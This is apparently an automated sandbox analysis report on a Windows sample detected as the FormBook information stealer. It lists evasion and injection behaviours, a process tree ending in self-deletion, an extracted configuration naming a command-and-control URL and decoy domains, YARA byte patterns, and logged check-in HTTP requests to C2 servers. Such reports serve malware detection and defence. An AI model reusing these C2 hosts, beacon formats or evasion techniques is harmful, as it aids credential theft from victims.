Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report z7d1ehQQQW.exe

Overview

General Information

Sample Name:z7d1ehQQQW.exe
Analysis ID:491384
MD5:50568fb6133ee4ed721ee46a3c0a9e98
SHA1:4897b6f2141395071652f72d34dc3d39eb014a56
SHA256:2b1a98add215568bb5e1c333321cf0ffe98d9128fa149c4f5a07ce2922750b3e
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • z7d1ehQQQW.exe (PID: 984 cmdline: 'C:\Users\user\Desktop\z7d1ehQQQW.exe' MD5: 50568FB6133EE4ED721EE46A3C0A9E98)
    • z7d1ehQQQW.exe (PID: 5800 cmdline: C:\Users\user\Desktop\z7d1ehQQQW.exe MD5: 50568FB6133EE4ED721EE46A3C0A9E98)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 6944 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6480 cmdline: /c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.odysseysailingsantorini.com/cmsr/"], "decoy": ["dahlia-dolls.com", "iamawife.com", "gardunomx.com", "roweelitetrucking.com", "asapvk.com", "strategieslimited.com", "healthyweathorganics.com", "wedding-gallery.net", "fastoffer.online", "biolab33.cloud", "los40delocta.com", "charliepaton.com", "jenpaddock.com", "zzmweb.com", "poetarts.com", "techwork4u.com", "tracylynpropp.com", "rkbodyfit.site", "migaleriapanama.com", "cosmostco.com", "johnsoncamping.com", "flowfinancialplanning.com", "xn--caamosdemexico-rnb.com", "plusqueindia.com", "wwwhyprr.com", "benimofis.com", "tandteutopia.com", "spaintravelvacation.com", "dear.services", "zhiwugongfang.com", "blogdavnc.com", "justicefundingexchange.com", "alphasecreweb.info", "xitechgroup.com", "kendalmountain.digital", "nieght.com", "pieter-janenmaaike.online", "myexclusiveshop.com", "love-potato.online", "mondebestglobal.com", "ranchlandconcierge.com", "southerngraphx.com", "pray4usa.info", "vilchesfinancial.com", "zelvio.store", "zenibusiness.com", "kindredhue.com", "californiatacosdinuba.com", "uncommonsolutionsllc.com", "easy-lah.com", "disciplesevents.com", "856380127.xyz", "zapzapgone.com", "paradisgrp.com", "programmerworks.info", "purchasesuite.com", "dorotajedrusik.com", "555999dy.com", "uvoyus.com", "utang.net", "elizabethhelma.com", "noseainsight.com", "simpleterior.com", "casatensina.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x2675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x2161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x2777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x28ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x13dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x8317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x931a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x53f9:$sqlite3step: 68 34 1C 7B E1
    • 0x550c:$sqlite3step: 68 34 1C 7B E1
    • 0x5428:$sqlite3text: 68 38 2A 90 C5
    • 0x554d:$sqlite3text: 68 38 2A 90 C5
    • 0x543b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x5563:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.z7d1ehQQQW.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.z7d1ehQQQW.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.z7d1ehQQQW.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x183f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1850c:$sqlite3step: 68 34 1C 7B E1
        • 0x18428:$sqlite3text: 68 38 2A 90 C5
        • 0x1854d:$sqlite3text: 68 38 2A 90 C5
        • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
        0.2.z7d1ehQQQW.exe.2d13274.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          5.2.z7d1ehQQQW.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 2 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.odysseysailingsantorini.com/cmsr/"], "decoy": ["dahlia-dolls.com", "iamawife.com", "gardunomx.com", "roweelitetrucking.com", "asapvk.com", "strategieslimited.com", "healthyweathorganics.com", "wedding-gallery.net", "fastoffer.online", "biolab33.cloud", "los40delocta.com", "charliepaton.com", "jenpaddock.com", "zzmweb.com", "poetarts.com", "techwork4u.com", "tracylynpropp.com", "rkbodyfit.site", "migaleriapanama.com", "cosmostco.com", "johnsoncamping.com", "flowfinancialplanning.com", "xn--caamosdemexico-rnb.com", "plusqueindia.com", "wwwhyprr.com", "benimofis.com", "tandteutopia.com", "spaintravelvacation.com", "dear.services", "zhiwugongfang.com", "blogdavnc.com", "justicefundingexchange.com", "alphasecreweb.info", "xitechgroup.com", "kendalmountain.digital", "nieght.com", "pieter-janenmaaike.online", "myexclusiveshop.com", "love-potato.online", "mondebestglobal.com", "ranchlandconcierge.com", "southerngraphx.com", "pray4usa.info", "vilchesfinancial.com", "zelvio.store", "zenibusiness.com", "kindredhue.com", "californiatacosdinuba.com", "uncommonsolutionsllc.com", "easy-lah.com", "disciplesevents.com", "856380127.xyz", "zapzapgone.com", "paradisgrp.com", "programmerworks.info", "purchasesuite.com", "dorotajedrusik.com", "555999dy.com", "uvoyus.com", "utang.net", "elizabethhelma.com", "noseainsight.com", "simpleterior.com", "casatensina.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: z7d1ehQQQW.exeVirustotal: Detection: 24%Perma Link
            Source: z7d1ehQQQW.exeReversingLabs: Detection: 13%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORY
            Antivirus detection for URL or domainShow sources
            Source: http://www.noseainsight.com/cmsr/?jtxXAR=f6Ad&4h0XO=aWr8NZzAm1//W065YDaH8MvMe5V7nlKazoNvd1fDio5dOX3Vx686XIFmrsqZJNrwHW47Avira URL Cloud: Label: malware
            Source: 5.2.z7d1ehQQQW.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: z7d1ehQQQW.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: z7d1ehQQQW.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: z7d1ehQQQW.exe, 00000005.00000002.736665067.0000000003520000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: z7d1ehQQQW.exe, 00000005.00000002.736099358.00000000019AF000.00000040.00000001.sdmp, cscript.exe, 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: z7d1ehQQQW.exe, 00000005.00000002.736099358.00000000019AF000.00000040.00000001.sdmp, cscript.exe
            Source: Binary string: cscript.pdb source: z7d1ehQQQW.exe, 00000005.00000002.736665067.0000000003520000.00000040.00020000.sdmp
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 4x nop then pop ebx5_2_00407AFA
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 4x nop then pop edi5_2_00417D59
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop ebx9_2_02D57AFB

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49822 -> 35.246.6.109:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49822 -> 35.246.6.109:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49822 -> 35.246.6.109:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49852 -> 47.91.170.222:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49852 -> 47.91.170.222:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49852 -> 47.91.170.222:80
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.dorotajedrusik.com
            Source: C:\Windows\explorer.exeDomain query: www.noseainsight.com
            Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.odysseysailingsantorini.com/cmsr/
            Source: global trafficHTTP traffic detected: GET /cmsr/?jtxXAR=f6Ad&4h0XO=aWr8NZzAm1//W065YDaH8MvMe5V7nlKazoNvd1fDio5dOX3Vx686XIFmrsqZJNrwHW47 HTTP/1.1Host: www.noseainsight.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /cmsr/?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR/3kPtojHfoDwxQoDiPWi0/zmWdCsSN34zRZDM7Yr&jtxXAR=f6Ad HTTP/1.1Host: www.dorotajedrusik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: z7d1ehQQQW.exe, 00000000.00000003.656320601.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
            Source: z7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: z7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comCe
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: z7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comn-uL
            Source: z7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comt
            Source: z7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comw.c
            Source: z7d1ehQQQW.exe, 00000000.00000003.659128745.0000000005AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.co
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.664218437.0000000005B00000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.658968542.0000000005AFF000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.657880283.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: z7d1ehQQQW.exe, 00000000.00000003.657716958.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: z7d1ehQQQW.exe, 00000000.00000003.657716958.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/O
            Source: z7d1ehQQQW.exe, 00000000.00000003.659434113.0000000005B00000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.658933536.0000000005AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: z7d1ehQQQW.exe, 00000000.00000003.658881250.0000000005AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.htmlO
            Source: z7d1ehQQQW.exe, 00000000.00000003.660117823.0000000005B00000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers2I
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.658933536.0000000005AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: z7d1ehQQQW.exe, 00000000.00000003.657764912.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersMF5
            Source: z7d1ehQQQW.exe, 00000000.00000003.659553696.0000000005B00000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersW
            Source: z7d1ehQQQW.exe, 00000000.00000003.657764912.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersd
            Source: z7d1ehQQQW.exe, 00000000.00000003.657817317.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerses-es_tradnl;
            Source: z7d1ehQQQW.exe, 00000000.00000003.660082867.0000000005B00000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersn
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: z7d1ehQQQW.exe, 00000000.00000003.654997513.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn;
            Source: z7d1ehQQQW.exe, 00000000.00000003.654997513.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnp
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.661245659.0000000005B00000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.655831522.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-czt
            Source: z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/1
            Source: z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/G
            Source: z7d1ehQQQW.exe, 00000000.00000003.655831522.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/f
            Source: z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/i
            Source: z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
            Source: z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/f
            Source: z7d1ehQQQW.exe, 00000000.00000003.655831522.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s-1
            Source: z7d1ehQQQW.exe, 00000000.00000003.657056723.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.656667821.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: z7d1ehQQQW.exe, 00000000.00000003.655730815.0000000005B00000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com0K
            Source: z7d1ehQQQW.exe, 00000000.00000003.655730815.0000000005B00000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comlic
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: z7d1ehQQQW.exe, 00000000.00000003.660250458.0000000005B00000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: z7d1ehQQQW.exe, 00000000.00000003.657537776.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deF
            Source: z7d1ehQQQW.exe, 00000000.00000003.657716958.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deold
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: cscript.exe, 00000009.00000002.918829235.00000000052AF000.00000004.00020000.sdmpString found in binary or memory: https://www.dorotajedrusik.com/cmsr?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR%2F3kPtojHfoDwxQoDiPWi0%2FzmWd
            Source: unknownDNS traffic detected: queries for: www.noseainsight.com
            Source: global trafficHTTP traffic detected: GET /cmsr/?jtxXAR=f6Ad&4h0XO=aWr8NZzAm1//W065YDaH8MvMe5V7nlKazoNvd1fDio5dOX3Vx686XIFmrsqZJNrwHW47 HTTP/1.1Host: www.noseainsight.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /cmsr/?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR/3kPtojHfoDwxQoDiPWi0/zmWdCsSN34zRZDM7Yr&jtxXAR=f6Ad HTTP/1.1Host: www.dorotajedrusik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
